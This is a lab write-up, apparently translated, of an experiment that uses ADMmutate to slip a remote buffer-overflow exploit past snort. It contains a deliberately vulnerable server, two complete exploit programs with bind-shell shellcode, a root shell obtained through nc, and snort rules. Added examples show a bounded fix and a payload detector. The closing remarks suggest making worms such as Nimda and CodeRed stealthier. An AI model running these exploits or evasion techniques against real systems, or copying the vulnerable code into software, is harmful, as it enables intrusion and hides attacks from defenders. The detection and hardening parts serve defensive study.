Preface: This is only an experiment. Three machines were used: two running Linux (RedHat 6.2 under VMware, a colleague's machines, borrowed :) and one running the NIDS (snort 1.8 WIN32). Of these: server IP: 192.168.100.170, client IP: 192.168.100.171, NIDS IP: 192.168.100.172
Goal: To test whether ADMmutate can be used to carry out a remote buffer overflow while escaping the NIDS's monitoring, and whether the NIDS can be configured to detect such an attack!
Introduction to ADMmutate:
This program was written by k2. It uses a technique known as polymorphic code, which lets an attacker potentially change the structure of the code to fool many intrusion detection systems without breaking the original attack program. Once an overflow program has been run through it, it is transformed, and because the transformation is dynamic, the disguised shellcode is different every time. An IDS normally detects and alerts by extracting signatures from publicly released overflow programs; once the signature changes, the IDS no longer detects them.
Before disguise, the shellcode has the layout: [NNNNNNNNNNNNN][SSSS][RRRR]
After disguise, the layout is: [nnnnnnn][dddd][ssss][rrrr]
where N is a NOP, S the shellcode and R the return address; n is an encoded NOP, d the decoder, s the encoded shellcode and r the return address.
(ADMmutate can be downloaded from k2's homepage: http://www.ktwo.ca/c/ADMmutate-0.7.3.tar.gz)
Test procedure: (the programs below involve remote buffer overflows; if anything is unclear, see "Advanced Buffer Overflows, part 2" or "How to write a remote buffer overflow exploit")
1. Run the vulnerable server program (vulnerable) on the server
//-------------vulnerable server program (vulnerable.c)-------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define BUFFER_SIZE 1024
#define NAME_SIZE 2048

int handling(int c)
{
    char buffer[BUFFER_SIZE], name[NAME_SIZE];
    int bytes;

    strcpy(buffer, "My name is: ");
    bytes = send(c, buffer, strlen(buffer), 0);
    if (bytes == -1)
        return -1;
    /* up to NAME_SIZE (2048) bytes are read into name... */
    bytes = recv(c, name, sizeof(name), 0);
    if (bytes <= 0)
        return -1;
    name[bytes - 1] = '\0';
    /* ...and copied unchecked into the BUFFER_SIZE (1024) byte buffer: this is the overflow */
    sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);
    bytes = send(c, buffer, strlen(buffer), 0);
    if (bytes == -1)
        return -1;
    return 0;
}

int main(int argc, char *argv[])
{
    int s, c;
    socklen_t cli_size;
    struct sockaddr_in srv, cli;

    if (argc != 2) {
        fprintf(stderr, "usage: %s port\n", argv[0]);
        return 1;
    }
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s == -1) {
        perror("socket() failed");
        return 2;
    }
    srv.sin_addr.s_addr = INADDR_ANY;
    srv.sin_port = htons((unsigned short int) atol(argv[1]));
    srv.sin_family = AF_INET;
    if (bind(s, (struct sockaddr *) &srv, sizeof(srv)) == -1) {
        perror("bind() failed");
        return 3;
    }
    if (listen(s, 3) == -1) {
        perror("listen() failed");
        return 4;
    }
    for (;;) {
        cli_size = sizeof(cli);
        c = accept(s, (struct sockaddr *) &cli, &cli_size);
        if (c == -1) {
            perror("accept() failed");
            return 5;
        }
        printf("client from %s\n", inet_ntoa(cli.sin_addr));
        if (handling(c) == -1)
            fprintf(stderr, "%s: handling() failed\n", argv[0]);
        close(c);
    }
    return 0;
}
-----------------------------------------------------------------------
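As an added example (not part of the original article), here is a bounded rewrite of the handling() routine above: the greeting is built with snprintf() into the same 1024-byte buffer, a name that cannot fit is rejected instead of being copied past the end of buffer[], and an empty read no longer writes to name[-1]. The function names build_greeting, strip_newline, handling_safe and greeting_len_for are my own, not the article's.

```c
/* Added example: a bounded version of handling() from vulnerable.c.
 * Everything here is constructed for illustration; the names are assumptions. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>
#include <sys/types.h>
#include <sys/socket.h>

#define BUFFER_SIZE 1024
#define NAME_SIZE   2048

/* Fixed text around the name, including the terminating NUL: 28 bytes. */
#define GREETING_OVERHEAD (sizeof("Hello , nice to meet you!\r\n"))
/* Longest name that still fits in BUFFER_SIZE: 1024 - 28 = 996. */
#define MAX_NAME_LEN (BUFFER_SIZE - GREETING_OVERHEAD)

/* Drop a trailing LF or CRLF (the original did name[bytes - 1] = '\0'). */
size_t strip_newline(const char *name, size_t len)
{
    while (len > 0 && (name[len - 1] == '\n' || name[len - 1] == '\r'))
        len--;
    return len;
}

/* Build "Hello <name>, nice to meet you!\r\n" into out[outlen].
 * Returns the length written (without NUL) or -1 if it would not fit.
 * The name is passed with an explicit length and printed with %.*s,
 * so it need not be NUL-terminated. */
int build_greeting(char *out, size_t outlen, const char *name, size_t namelen)
{
    int n;
    if (namelen > MAX_NAME_LEN)
        return -1;                       /* reject rather than truncate silently */
    n = snprintf(out, outlen, "Hello %.*s, nice to meet you!\r\n", (int)namelen, name);
    if (n < 0 || (size_t)n >= outlen)    /* snprintf reports the would-be length */
        return -1;
    return n;
}

/* Same protocol as handling(): prompt, read a name, answer. */
int handling_safe(int c)
{
    char buffer[BUFFER_SIZE], name[NAME_SIZE];
    static const char prompt[] = "My name is: ";
    static const char toolong[] = "Sorry, that name is too long.\r\n";
    ssize_t bytes;
    int n;

    if (send(c, prompt, sizeof(prompt) - 1, 0) == -1)
        return -1;
    bytes = recv(c, name, sizeof(name), 0);  /* bounded by sizeof(name), as before */
    if (bytes <= 0)                           /* error or peer closed: no name[-1] write */
        return -1;
    n = build_greeting(buffer, sizeof(buffer), name, strip_newline(name, (size_t)bytes));
    if (n < 0) {
        send(c, toolong, sizeof(toolong) - 1, 0);
        return -1;
    }
    return send(c, buffer, (size_t)n, 0) == -1 ? -1 : 0;
}

/* Stand-alone check without a socket: does a name of the given length fit? */
int greeting_len_for(size_t namelen)
{
    char out[BUFFER_SIZE];
    static char name[NAME_SIZE];
    memset(name, 'A', sizeof name);          /* constructed name: all 'A' */
    if (namelen > sizeof name)
        return -1;
    return build_greeting(out, sizeof out, name, namelen);
}

int main(void)
{
    size_t lens[] = { 3, 996, 997, 2047 };
    for (size_t i = 0; i < 4; i++)
        printf("name of %4zu bytes -> greeting length %d\n", lens[i], greeting_len_for(lens[i]));
    return 0;
}
```

With a 2047-byte request, the size the exploit below sends, build_greeting() returns -1 and the connection is answered with an error line; the 1024-byte buffer is never written past its end, so the return address on the stack is left untouched whatever the request contains.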
server:~/ > gcc vulnerable.c -o vulnerable
server:~/ > ./vulnerable 5555&
(The program now listens on port 5555 and waits for connections.)

2. Run snort on the NIDS machine:
D:\Tools\Defence\snort>snort -A fast -l log -c shellcode.rules
The shellcode rules include:
alert tcp any any -> any any (msg:"SHELLCODE x86 NOP"; content: "|90 90 90 90 90 90 90 90 90 90 90 90 90 90|"; depth: 128; reference:arachnids,181; classtype:bad-unknown; sid:648; rev:2;)
// This rule detects the large run of NOPs in the shellcode.
alert tcp any any -> any any (msg:"SHELLCODE linux shellcode"; content:"/bin/sh"; reference:arachnids,343; classtype:attempted-admin; sid:652; rev:2;)
// This rule detects the string /bin/sh in the shellcode.
alert tcp any any -> any any (msg:"SHELLCODE x86 stealth NOP"; content: "|eb 02 eb 02 eb 02|"; reference:arachnids,291; classtype:bad-unknown; sid:651; rev:2;)
// This rule detects the jmp 0x02 (hex eb 02) that is used in place of NOPs in the shellcode. Replacing NOPs with eb 02 is mainly meant to evade NIDS that decide whether an overflow is present by looking for NOPs.

3. Run the normal remote buffer overflow program (exploit) on the client
//----------------- normal exploit.c ----------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define SIZE 2048
#define NOPDEF 861

char shellcode[] =
    "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
    "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
    "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
    "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
    "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
    "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
    "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
    "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
/* (A shellcode that binds a shell to port 3879 (\x0f\x27)!) */

unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
    char buffer[SIZE];
    int s, i, size, offset;
    unsigned long addr;
    struct sockaddr_in remote;
    struct hostent *host;
    int nop = NOPDEF;

    if (argc != 4) {
        printf("Usage: %s target-ip port offset\n", argv[0]);
        return -1;
    }

    offset = atoi(argv[3]);
    addr = get_sp() - offset;
    printf("Jump to 0x%08x\n", addr);

    memset(buffer, 0x90, SIZE);
    memcpy(buffer + nop, shellcode, strlen(shellcode));
    for (i = nop + strlen(shellcode); i < SIZE - 4; i += 4) {
        *((unsigned long *) &buffer[i]) = addr;
    }
    buffer[2047] = 0x0;
    printf("%s\n", buffer);

    // getting hostname
    host = gethostbyname(argv[1]);
    if (host == NULL) {
        fprintf(stderr, "Unknown Host %s\n", argv[1]);
        return -1;
    }

    // creating socket...
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) {
        fprintf(stderr, "Error: Socket\n");
        return -1;
    }

    // state protocol family, then convert the hostname or IP address, and get the port number
    remote.sin_family = AF_INET;
    remote.sin_addr = *((struct in_addr *) host->h_addr);
    remote.sin_port = htons(atoi(argv[2]));

    // connecting with destination host
    if (connect(s, (struct sockaddr *) &remote, sizeof(remote)) == -1) {
        close(s);
        fprintf(stderr, "Error: connect\n");
        return -1;
    }

    // sending exploit string
    size = send(s, buffer, sizeof(buffer), 0);
    if (size == -1) {
        close(s);
        fprintf(stderr, "sending data failed\n");
        return -1;
    }
    // closing socket
    close(s);
    return 0;
}
-------------------------------------------------------------------
client:~/ > gcc exploit.c -o exploit
client:~/> ./exploit 192.168.100.170 5555 200
Jump to 0xbffff220
[the printed buffer follows: 861 NOP bytes (0x90), the shellcode and the repeated return address, shown on the original page as unreadable binary rendered as text; omitted here]
client:~/># nc 192.168.100.170 3879
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Overflow succeeded! Check the snort log:
10/13-15:59:09.745690 [**] [1:648:2] SHELLCODE x86 NOP [**] [Classification: (null)] [Priority: 0] 192.168.100.171:1222 -> 192.168.100.170:5555
or
10/13-16:02:05.635598 [**] [1:652:2] SHELLCODE linux shellcode [**] [Classification: (null)] [Priority: 0] 192.168.100.171:1225 -> 192.168.100.170:5555
(Which one fires depends on the order of the detection rules!)

4. Run the disguised program (exploitk2) on the client
//-------- disguised exploitk2.c ----------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include "ADMmutapi.h"

#define SIZE 2048
#define NOPDEF 861

char shellcode[] =
    "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
    "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
    "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
    "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
    "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
    "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
    "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
    "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
    char buffer[SIZE];
    int s, i, size, offset;
    unsigned long addr;
    struct sockaddr_in remote;
    struct hostent *host;
    int epad = 8;   /* a pad of at LEAST 8 is required for this sploit */
    int nop = NOPDEF;
    struct morphctl *mctlp;
    struct morphctl mut;

    mut.upper = 0;
    mut.lower = 0;
    mctlp = &mut;
    mut.banned = 0;
    mut.arch = IA32;

    if (argc != 4) {
        printf("Usage: %s target-ip port offset\n", argv[0]);
        return -1;
    }

    offset = atoi(argv[3]);
    addr = get_sp() - offset;
    printf("Jump to 0x%08x\n", addr);

    memset(buffer, 0x90, SIZE);
    memcpy(buffer + nop, shellcode, strlen(shellcode));
    for (i = nop + strlen(shellcode); i < SIZE - 4; i += 4) {
        *((unsigned long *) &buffer[i]) = addr;
    }
    buffer[2047] = 0x0;

    init_mutate(mctlp);   // initialise the architecture and function pointers selected in mut.arch
    if (apply_key(buffer, strlen(shellcode) + epad, nop - 1, mctlp) != 0) {
        exit(1);
    }                     // generate a key and encode the shellcode with it
    if (apply_jnops(buffer, nop - 1, mut) != 0) {
        exit(2);
    }                     // replace the NOPs with other junk instructions
    if (apply_engine(buffer, strlen(shellcode) + epad, nop - 1, mut) != 0) {
        exit(3);
    }                     // generate the decoder
    printf("%s\n", buffer);

    // getting hostname
    host = gethostbyname(argv[1]);
    if (host == NULL) {
        fprintf(stderr, "Unknown Host %s\n", argv[1]);
        return -1;
    }

    // creating socket...
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) {
        fprintf(stderr, "Error: Socket\n");
        return -1;
    }

    // state protocol family, then convert the hostname or IP address, and get the port number
    remote.sin_family = AF_INET;
    remote.sin_addr = *((struct in_addr *) host->h_addr);
    remote.sin_port = htons(atoi(argv[2]));

    // connecting with destination host
    if (connect(s, (struct sockaddr *) &remote, sizeof(remote)) == -1) {
        close(s);
        fprintf(stderr, "Error: connect\n");
        return -1;
    }

    // sending exploit string
    size = send(s, buffer, sizeof(buffer), 0);
    if (size == -1) {
        close(s);
        fprintf(stderr, "sending data failed\n");
        return -1;
    }
    // closing socket
    close(s);
    return 0;
}
--------------------------------------------------------------------
client:~/ > gcc exploitk2.c ADMmuteng.c -o exploitk2
client:~/> ./exploitk2 192.168.100.170 5555 300
Jump to 0xbffff18c
[the printed buffer follows: the encoded NOPs, the decoder, the encoded shellcode and the repeated return address, shown on the original page as unreadable binary rendered as text; omitted here]
client:~/> nc 192.168.100.170 3879
id
uid=0(root) gid=0(root) [unreadable bytes interleaved here on the original page] groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Overflow succeeded! Check the snort log:
NONE :(
This shows that shellcode encoded with k2's ADMmutate is not detected by pattern-matching snort. Is there really nothing to be done? There is something, but it may...
5. Add a rule:
alert tcp any any -> any :5555 (msg:"SHELLCODE x86 Length Too Large"; dsize:>1024;)
Run again: snort -A fast -l log -c shellcode.rules
Then run: ./exploitk2 192.168.100.170 5555 300
Check the snort log:
10/13-16:09:49.811615 [**] [1:0:0] SHELLCODE x86 Length Too Large [**] 192.168.100.171:1228 -> 192.168.100.170:5555
Judging whether a remote buffer overflow attack is present from the packet length in this way only suits certain specific ports, such as 80 and 53, and it carries the risk of false positives.
6. Repeat the attack several times:
client:~/> ./exploitk2 192.168.100.170 5555 300
Jump to 0xbffff18c
[encoded buffer, first run: unreadable binary on the original page; omitted]
client:~/> ./exploitk2 192.168.100.170 5555 300
Jump to 0xbffff18c
[encoded buffer, second run: a different byte sequence from the first run; unreadable binary on the original page; omitted]
This shows that shellcode disguised with k2's ADMmutate changes dynamically from run to run.
Conclusion: I later also tried a new-generation NIDS based on protocol analysis, command interpretation, pattern matching and anomaly statistics; it had the same problem. It is fair to say that shellcode disguised with k2's ADMmutate can escape most NIDS that rely on pattern matching and string matching! If, however, the NIDS also combines other judgments such as length and printable characters, ADMmutate still cannot escape its monitoring; but judgments based on length, printable characters and the like are not necessarily accurate, and relying on them causes the IDS to miss attacks or raise false alarms. Extracting a signature from the decoder in the exploit's shellcode is very hard, because the decoder is not fixed either and is padded with useless junk instructions. Matching NOPs is also very hard, since there are many instructions that can replace a NOP, of differing lengths; trying them all by brute force would greatly increase the NIDS's load and hurt its performance. Matching the shellcode itself is even less feasible, because the shellcode's key is generated from the current time, so each encoded shellcode is unique. So for pattern-matching NIDS only simple checks such as length remain at present; for some NIDS it may be possible to detect this by emulated execution!
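The checks discussed in steps 2 and 5 and in the conclusion, as an added example (not from the article and not snort's code): the three content signatures, the dsize:>1024 rule and a printable-character ratio, implemented in C and applied to four constructed sample payloads: a normal reply to the "My name is:" prompt, an oversized but purely textual reply, a payload shaped like step 3 (a run of 0x90, the string /bin/sh, filler) and a 2047-byte payload with no NOP run, no /bin/sh and no eb 02 that stands in for the shape of step 4. The 0.90 printable threshold, the sample bytes and all function names are assumptions.

```c
/* Added example: the detection checks discussed on this page, applied to
 * constructed sample payloads (none of these bytes come from the page's
 * captured output). */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

#define NOP_RUN       14    /* sid 648: fourteen 0x90 bytes ...            */
#define NOP_DEPTH     128   /* ... within the first 128 bytes (depth:128)  */
#define DSIZE_LIMIT   1024  /* the dsize:>1024 rule added in step 5        */
#define PRINTABLE_MIN 0.90  /* assumed threshold for a text protocol field */
#define SAMPLE_MAX    2048

struct verdict {
    int nop_sled;       /* SHELLCODE x86 NOP (sid 648)          */
    int bin_sh;         /* SHELLCODE linux shellcode (sid 652)  */
    int stealth_nop;    /* SHELLCODE x86 stealth NOP (sid 651)  */
    int too_large;      /* SHELLCODE x86 Length Too Large       */
    int low_printable;  /* printable-character ratio heuristic  */
};

/* True if byte b occurs runlen times in a row within the first depth bytes. */
static int has_run(const unsigned char *p, size_t n, size_t depth, unsigned char b, size_t runlen)
{
    size_t run = 0, limit = n < depth ? n : depth;
    for (size_t i = 0; i < limit; i++) {
        run = (p[i] == b) ? run + 1 : 0;
        if (run >= runlen) return 1;
    }
    return 0;
}

/* Binary substring search, i.e. a content: match (memmem() is not portable C). */
static int has_bytes(const unsigned char *p, size_t n, const unsigned char *pat, size_t m)
{
    if (m == 0 || n < m) return 0;
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(p + i, pat, m) == 0) return 1;
    return 0;
}

/* Fraction of bytes that are printable ASCII or CR/LF/TAB. */
double printable_ratio(const unsigned char *p, size_t n)
{
    size_t ok = 0;
    if (n == 0) return 1.0;
    for (size_t i = 0; i < n; i++)
        if (isprint(p[i]) || p[i] == '\r' || p[i] == '\n' || p[i] == '\t') ok++;
    return (double)ok / (double)n;
}

struct verdict inspect(const unsigned char *p, size_t n)
{
    static const unsigned char stealth[] = { 0xeb, 0x02, 0xeb, 0x02, 0xeb, 0x02 };
    struct verdict v;
    v.nop_sled      = has_run(p, n, NOP_DEPTH, 0x90, NOP_RUN);
    v.bin_sh        = has_bytes(p, n, (const unsigned char *)"/bin/sh", 7);
    v.stealth_nop   = has_bytes(p, n, stealth, sizeof stealth);
    v.too_large     = n > DSIZE_LIMIT;
    v.low_printable = printable_ratio(p, n) < PRINTABLE_MIN;
    return v;
}

int alert_count(struct verdict v)
{
    return v.nop_sled + v.bin_sh + v.stealth_nop + v.too_large + v.low_printable;
}

/* Constructed samples (assumptions, not captured traffic):
 * 0: a normal reply to "My name is: "
 * 1: an oversized but purely textual reply
 * 2: the shape of the step-3 payload: NOP run, the string /bin/sh, filler
 * 3: the shape of a step-4 payload: 2047 bytes with no NOP run, no /bin/sh and
 *    no eb 02; every byte is >= 0x80 and no two neighbours are equal, so the
 *    sequence is deterministic pseudo-noise rather than a real encoding */
size_t build_sample(int which, unsigned char *out)
{
    size_t n = 0;
    switch (which) {
    case 0: n = 7; memcpy(out, "Alice\r\n", n); break;
    case 1: memset(out, 'A', 1500); memcpy(out + 1500, "\r\n", 2); n = 1502; break;
    case 2: memset(out, 0x90, 861); memcpy(out + 861, "/bin/sh", 7);
            memset(out + 868, 'B', 2047 - 868); n = 2047; break;
    case 3: for (size_t i = 0; i < 2047; i++)
                out[i] = (unsigned char)(0x80 + (i * 37 + 11) % 113);
            n = 2047; break;
    }
    return n;
}

struct verdict inspect_sample(int which)
{
    unsigned char buf[SAMPLE_MAX];
    size_t n = build_sample(which, buf);
    return inspect(buf, n);
}

int main(void)
{
    static const char *label[] = { "normal name", "long text", "plain sled", "encoded-shape" };
    for (int i = 0; i < 4; i++) {
        struct verdict v = inspect_sample(i);
        printf("%-14s nop=%d bin_sh=%d eb02=%d dsize=%d lowprint=%d -> %d alert(s)\n",
               label[i], v.nop_sled, v.bin_sh, v.stealth_nop, v.too_large,
               v.low_printable, alert_count(v));
    }
    return 0;
}
```

The output makes the point of the conclusion concrete: the sled-shaped payload trips four checks, the encoded-shape payload trips only the length and printable-ratio checks, and the oversized text reply trips the length check alone, which is exactly the false positive the article warns about for ports such as 80 and 53. Raising PRINTABLE_MIN or lowering DSIZE_LIMIT trades one kind of error for the other.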
To be added: Unfortunately I did not try other NIDS! A pity! :( More detailed material on ADMmutate is not yet organized! :(
A few thoughts:
Overflows under Windows should also be able to use this method. Combining the techniques used by whisker and ADMmutate, or borrowing their ideas, should make it possible to write stealthier and more powerful attack programs and worms. Improving Nimda or CodeRed along these lines might make them stealthier and harder to detect!
References:
Reference material on ADMmutate-0.7.3
How to write a remote buffer overflow exploit